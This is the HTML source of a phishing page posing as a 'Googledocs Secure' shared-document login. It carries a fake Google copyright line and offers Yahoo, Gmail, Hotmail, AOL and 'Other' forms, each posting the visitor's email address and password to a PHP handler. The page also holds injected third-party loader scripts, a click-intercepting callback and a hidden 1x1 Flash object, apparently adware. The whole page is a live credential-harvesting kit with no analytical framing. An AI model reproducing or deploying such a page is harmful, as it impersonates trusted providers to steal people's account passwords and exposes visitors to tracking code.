<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<center><body background="index_files/on8.jpg"></center>
<title>Googledocs Secure</title> 
<link rel="stylesheet" type="text/css" href="index_files/style.htm"> 
<link rel="shortcut icon" href="index_files/favicon.ico">
<style type="text/css"> 
div {
	position: absolute;
	left: 620px;
	top: 40px;
	background-color: #EBEBEB;
	width: 280px;
	padding: 10px;
	color: #000000;
	border: #0000cc 2px dashed;
	display: none;
}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
</style> 
<script language="Javascript"> 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
</script> 
<script language="javascript"> 
function toggle() {
	var ele = document.getElementById("toggleText");
	var text = document.getElementById("displayText");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}
 
function togglegmail() {
	var ele = document.getElementById("toggleTextgmail");
	var text = document.getElementById("displayTextgmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
 
function togglehotmail() {
	var ele = document.getElementById("toggleTexthotmail");
	var text = document.getElementById("displayTexthotmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
function toggleaol() {
	var ele = document.getElementById("toggleTextaol");
	var text = document.getElementById("displayTextaol");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
function toggleother() {
	var ele = document.getElementById("toggleTextother");
	var text = document.getElementById("displayTextother");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
</script> 

<script type="text/javascript">(typeof _GPL_16_loaded == 'undefined') && (_GPL_16_loaded=true) && (_GPL_i=document.getElementsByTagName('head')) && (_GPL_i=(_GPL_i.length>0)?_GPL_i:document.getElementsByTagName('body')) && (_GPL_i.length>0) && (_GPL_j=document.createElement('script')) && (_GPL_j.async=true) && (_GPL_j.type='text/javascript') && (_GPL_j.src='https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_16.js?pid=16&zoneid=7818&cid=US&rid=NV&ccid=Fernley&ip=199.48.177.231&aoi=1316649369') && (_GPL_i[0].appendChild(_GPL_j))</script><script type="text/javascript">if (window.addEventListener) { 
  var callback_func = function(evt) { 
    if ('undefined' != typeof evt.target && "A" == evt.target.nodeName) { 
      var url = evt.target.href; 
      EBCallBackMessageReceivedCT2612669_129564560723477699(url); 
    } 
    return true; 
  }; 
  var result = window.addEventListener('click', callback_func, true); 
  var result = window.addEventListener('contextmenu', callback_func, true); 
} else if (document.attachEvent) {
  var callback_func = function () { 
    if ('undefined' != typeof event.srcElement &&'A' == event.srcElement.tagName) { 
      var url = event.srcElement.href; 
      EBCallBackMessageReceivedCT2612669_129564560723477699(url); 
    } 
    return true; 
  }; 
  var result = document.attachEvent('onclick', callback_func); 
  var result = document.attachEvent('oncontextmenu', callback_func); 
} 
 

</script></head> <br><br>
<center><p>
 
<font color="#66CCFF" size="4">To View shared document
you are required to Login <br>with your email address below</font></p>
 

<body bgcolor="#efefef">
<table id="wrapper" align="center" bgcolor="#cccccc" cellpadding="10" cellspacing="1"><tbody><tr><td bgcolor="#ffffff"> 
 <center><img src="index_files/doc.png" height="120" width="180"> </center>
<table width="100%"><tbody><tr><td width="50%"> 
 



</td></tr></tbody></table> 
 

 
 
<table id="invoicetoptables" cellspacing="0" width="100%"> 
<tbody><tr> 
<td id="invoicecontent" width="50%"> 
 
<table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%"> 
<tbody><tr> 
<td id="invoicecontent" style="border: 0px solid rgb(204, 204, 204);" valign="top"> 

<font class="paid">Choose your email provider below and login:</font> 

<br> 

<br> 

<br> 
<p align="center"> 
<a href="javascript:toggle();"><img src="index_files/yahoo.jpg" title="Yahoomail" id="displayText" border="0" height="48" width="132"></a> 
&nbsp;&nbsp;&nbsp; <a href="javascript:togglegmail();"><img src="index_files/gmail.jpg" title="Gmail" id="displayTextgmail" border="0" height="48" width="132"></a> 
<br> 
<br> 
<br> 
<a href="javascript:togglehotmail();"><img src="index_files/hotmail.jpg" title="Hotmail" id="displayTexthotmail" border="0" height="48" width="132"></a> 
&nbsp;&nbsp;&nbsp; <a href="javascript:toggleaol();"><img src="index_files/aol.jpg" title="Aol" id="displayTextaol" border="0" height="48" width="132"></a> 
<br> 
<br> 
<br> 
<a href="javascript:toggleother();"><img src="index_files/other.jpg" title="Other Email" id="displayTextother" border="0" height="48" width="132"></a> 

</p> 
 

<!-- YAHOO CONFIG !--> 

<div id="toggleText" style="display: none"> 
<p><img src="index_files/yahoo.jpg" title="Yahoomail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="yahoo" method="post" action="yahoo.php" onSubmit="return ValidateFormYahoo()"> 
<p> 
<br> 
				<label>Yahoo Email Address:</label> 
                <br> 
				<input name="x0r1" style="width: 200px;" type="text"> 
			<br> 
				<label>Yahoo Password</label> 
                <br> 
				<input name="x0r2" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_yahoo" value="Sign In" type="submit"> 
			</p> 



</form> 
</div> 
 
<!-- GMAIL CONFIG !--> 
<div id="toggleTextgmail" style="display: none"> 
<p><img src="index_files/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="gmail" method="post" action="gmail.php" onSubmit="return ValidateFormGmail()"> 
<p> 
 
				<label>Gmail Email Address:</label> 

                <br> 
				<input name="x0r1" style="width: 200px;" type="text"> 
			<br> 
				<label>Gmail Password</label> 
                <br> 
				<input name="x0r2" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_gmail" value="Sign in" type="submit"> 
			</p> 
            </form> 
 



</div> 
 
<!-- HOTMAIL CONFIG !--> 
<div id="toggleTexthotmail" style="display: none"> 
<p><img src="index_files/hotmail.jpg" title="Hotmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="hotmail" method="post" action="hotmail.php" onSubmit="return ValidateFormHotmail()"> 
<p> 
				<label>Hotmail Email Address:</label> 
                <br> 
				<input name="x0r1" style="width: 200px;" type="text"> 
			<br> 
				<label>Hotmail Password</label> 
                <br> 
				<input name="x0r2" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_hotmail" value="Sign in" type="submit"> 
			</p> 
            </form> 



</div> 
 
<!-- AOL CONFIG !--> 
<div id="toggleTextaol" style="display: none"> 
<p><img src="index_files/aol.jpg" title="Aol" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="aol" method="post" action="aol.php" onSubmit="return ValidateFormAol()"> 
<p> 
				<label>Aol Email Address:</label> 
                <br> 
				<input name="x0r1" style="width: 200px;" type="text"> 
			<br> 
				<label>Aol Password</label> 
                <br> 
				<input name="x0r2" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_aol" value="Sign In" type="submit"> 
			</p> 
            </form> 



</div> 
 
<!-- OTHER CONFIG !--> 
<div id="toggleTextother" style="display: none"> 
<p><img src="index_files/other.jpg" title="Other" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="other" method="post" action="other.php" onSubmit="return ValidateFormOther()"> 
<p> 
				<label>Email Address:</label> 
                <br> 
				<input name="x0r1" style="width: 200px;" type="text"> 
			<br> 
				<label>Password</label> 
                <br> 
				<input name="x0r2" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_other" value="Sign In" type="submit"> 
			</p> 
            </form> 



</div> 
 
 </td> 
 </tr> 
 </tbody></table> 
</td></tr></tbody></table> 
 
</td> 
  
 
 
 
 
 
</tr></tbody></table><iframe style="display: none;" src="index_files/google.htm" id="y2Google"></iframe><div id="_GPL_e6a00_div" style="position: absolute;"><object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="_GPL_e6a00_swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" height="1" width="1"><param value="http://d3lvr7yuk4uaui.cloudfront.net/items/e6a00/storage.swf" name="movie"><param value="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" name="FlashVars"><param value="always" name="allowscriptaccess"><embed pluginspage="http://www.macromedia.com/go/getflashplayer" flashvars="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" loop="false" play="true" name="_GPL_e6a00_swf" bgcolor="#ffffff" src="index_files/storage.swf" align="middle" height="1" width="1"></object></div><div style="display: none;" id="YontooInstallID">53F185F5-B55B-7227-CDAE-4D9C688D1835</div></body></body></html>
<br><br><center><font color="#66CCFF">Create, share, and collaborate on the web with documents, spreadsheets, presentations, and more.<br>Copyright 2013 Google
